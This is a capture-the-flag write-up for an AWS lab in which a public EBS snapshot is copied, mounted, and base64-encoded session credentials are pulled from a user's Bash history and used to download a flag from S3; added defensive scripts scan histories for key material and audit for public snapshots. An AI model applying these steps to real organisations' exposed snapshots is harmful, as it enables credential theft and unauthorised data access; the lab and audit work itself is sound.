The SecOps Cheat Guide

SecurityLabs challenge: week two (public snapshot)

This one was a little more challenging than last week's, but was still pretty simple.

"Our developer team made a snapshot called challenge-2 public. Seems like this was a bad mistake!

Can you get the flag to prove severity of this mistake?"

  1. First, we need to find the snapshot ID. aws ec2 describe-snapshots gave us nothing with that name. Hrm. Maybe they made this a little interesting by staging it in another region? aws ec2 --region us-east-2 describe-snapshots gets us the snapshot ID!

  2. aws ec2 copy-snapshot --source-region us-east-2 --region us-east-1 --source-snapshot-id <id> (protip: you don't need to copy it to another region if you can launch an instance in us-east-2... I can't.)

  3. Convert the snapshot into a volume. aws ec2 create-volume --availability-zone us-east-1a --snapshot-id <snapshot ID from the copy output>

  4. Launch a Linux instance if you don't already have one you can use as a workbench. Once it is running, attach the volume you just created to the instance. Note the device name you are given; mine was /dev/sda2.

  5. On the workbench instance, verify the volume is attached: lsblk. If it shows your volume, mount it: mount /dev/sda2 /mnt (use /mnt, or whatever directory you want).

  6. Digging through the filesystem shows the ubuntu user. Opening their Bash history reveals a base64-encoded command. Running this back through base64 -d gives you an AWS access key ID, secret key, and session token!

  7. Set up a profile with these new creds: aws configure. If you already have a profile, just set environment variables instead:

export AWS_ACCESS_KEY_ID="key"
export AWS_SECRET_ACCESS_KEY="key"
export AWS_SESSION_TOKEN="token"
  8. Further inspection of the history shows a folder called "app". cd into that directory and you will find a Python script called "app.py". The app did not work (it threw an error about a function), so inspect the script: it gives you the bucket name and file name to download!

  9. Instead of fighting to fix the issue, I just created my own Python script:

import boto3

# Uses the session credentials exported above; replace the placeholders with the
# bucket name and object key read from app.py.
s3 = boto3.client('s3')
s3.download_file('BUCKET_NAME', 'KEY', 'FILE_NAME')

And voilà! flag.txt downloaded!
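The credential leak in step 6 is the part a defender can catch before an image ever leaves the account: scan the shell history files on a workload for AWS key material, including anything tucked inside a base64 blob, as part of building or sharing a snapshot. The following Python script is an added example written for this write-up, not code from the original post or the challenge; the history it scans is constructed inline and uses the placeholder access key ID and secret from AWS's own documentation, so nothing in it is a real credential.

```python
"""Scan a shell history (or any text file) for AWS credential material,
including credentials hidden inside base64 blobs.

Added example for this write-up; not part of the original post.
"""
import base64
import binascii
import re
import sys
from typing import List, Optional, Tuple

# Access key ids start with AKIA (long-term) or ASIA (temporary STS) + 16 chars.
ACCESS_KEY_RE = re.compile(r"\b(?:AKIA|ASIA)[A-Z0-9]{16}\b")
# Candidate base64 runs: base64 alphabet only and long enough to hold a credential.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Constructed sample history. The key id and secret are the placeholder values
# from AWS documentation (AKIAIOSFODNN7EXAMPLE / wJalrX...EXAMPLEKEY), encoded at
# runtime so the blob is guaranteed to decode cleanly.
_ENCODED_EXPORT = base64.b64encode(
    b"export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n"
    b"export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
).decode()

SAMPLE_HISTORY = (
    "ls -la\n"
    "cd app\n"
    f"echo {_ENCODED_EXPORT} | base64 -d\n"
    "python3 app.py\n"
    "export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n"
    "git status\n"
)


def mask(key_id: str) -> str:
    """Keep the four-character prefix that identifies the key type, hide the rest."""
    return key_id[:4] + "*" * (len(key_id) - 4)


def _decode_candidate(blob: str) -> Optional[str]:
    """Decode a base64 run to text, or None if it is not valid base64 / UTF-8."""
    padded = blob + "=" * (-len(blob) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def scan_history(text: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, finding_kind, detail) for every hit in the text.

    Kinds: 'plaintext-key-id' for an access key id sitting directly in a line,
    'base64-key-id' for one found only after decoding a blob, and
    'base64-secret' when a decoded blob exports AWS_SECRET_ACCESS_KEY.
    Key ids are masked in the report; secret values are never returned.
    """
    findings: List[Tuple[int, str, str]] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in ACCESS_KEY_RE.finditer(line):
            findings.append((lineno, "plaintext-key-id", mask(m.group())))
        for blob in B64_RE.findall(line):
            decoded = _decode_candidate(blob)
            if decoded is None:
                continue
            for m in ACCESS_KEY_RE.finditer(decoded):
                findings.append((lineno, "base64-key-id", mask(m.group())))
            if "AWS_SECRET_ACCESS_KEY" in decoded:
                findings.append((lineno, "base64-secret", "-"))
    return findings


if __name__ == "__main__":
    # Pass a path (e.g. the .bash_history on a mounted volume) or run on the sample.
    data = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_HISTORY
    for lineno, kind, detail in scan_history(data):
        print(f"line {lineno}: {kind} {detail}")
```

Run it against a mounted volume's home directories before a snapshot is shared; a single hit is reason enough to rotate the credential, since a base64 blob in history is no protection at all.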

Housekeeping:

  1. Remove the mount: umount /mnt
  2. Delete the snapshot and volume from your account. Also tear down the instance if you don't need it any longer.
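The root cause here was a snapshot shared with the "all" group in a region nobody was looking at, so the matching defensive check is to enumerate every region and flag any snapshot whose createVolumePermission attribute includes that group. The script below is an added example, not part of the original write-up or the challenge: it uses boto3's describe_regions, describe_snapshots and describe_snapshot_attribute calls and assumes the same configured credentials the write-up uses for aws ec2 describe-snapshots. The sample responses at the top are constructed (made-up snapshot IDs, real response shape) so the classification logic runs without an AWS account.

```python
"""Find EBS snapshots this account has shared publicly, in every region.

Added example for this write-up; not part of the original post.
"""
from typing import Dict, List

# Constructed sample: three describe-snapshot-attribute responses for the
# createVolumePermission attribute. Snapshot ids are made up; the dict shape
# follows the EC2 API response.
SAMPLE_ATTRIBUTES = {
    "snap-0aaa1111bbbb2222c": {"CreateVolumePermissions": [{"Group": "all"}]},
    "snap-0ddd3333eeee4444f": {"CreateVolumePermissions": [{"UserId": "111122223333"}]},
    "snap-0fff5555aaaa6666b": {"CreateVolumePermissions": []},
}


def classify_permissions(attr: Dict) -> str:
    """Map one createVolumePermission response to 'public', 'shared' or 'private'.

    A {'Group': 'all'} entry is exactly what makes a snapshot world-readable;
    a UserId entry is a share to one specific account, which is usually intended.
    """
    perms = attr.get("CreateVolumePermissions", [])
    if any(p.get("Group") == "all" for p in perms):
        return "public"
    if perms:
        return "shared"
    return "private"


def find_public(attrs: Dict[str, Dict]) -> List[str]:
    """Snapshot ids that are public, sorted so reports are stable."""
    return sorted(s for s, a in attrs.items() if classify_permissions(a) == "public")


def audit_account() -> Dict[str, List[str]]:
    """Walk every enabled region and collect public snapshots owned by this account.

    boto3 is imported here rather than at module level so the pure helpers above
    can be used (and tested) on a machine without boto3 or AWS access.
    """
    import boto3

    home = boto3.client("ec2")
    findings: Dict[str, List[str]] = {}
    for region in home.describe_regions()["Regions"]:
        name = region["RegionName"]
        ec2 = boto3.client("ec2", region_name=name)
        attrs: Dict[str, Dict] = {}
        # OwnerIds=['self'] limits the listing to our own snapshots; without it
        # the listing also includes every public snapshot visible in the region.
        for page in ec2.get_paginator("describe_snapshots").paginate(OwnerIds=["self"]):
            for snap in page["Snapshots"]:
                attrs[snap["SnapshotId"]] = ec2.describe_snapshot_attribute(
                    SnapshotId=snap["SnapshotId"], Attribute="createVolumePermission"
                )
        public = find_public(attrs)
        if public:
            findings[name] = public
    return findings


if __name__ == "__main__":
    print("constructed sample ->", find_public(SAMPLE_ATTRIBUTES))
    for region, snaps in audit_account().items():
        for snap in snaps:
            print(f"PUBLIC  {region}  {snap}")
```

Run on a schedule, this turns a quiet mistake in us-east-2 into a finding within hours instead of a CTF challenge. Prevention is simpler still: AWS offers an account-level "block public access for EBS snapshots" setting per region, which stops the share from being created in the first place.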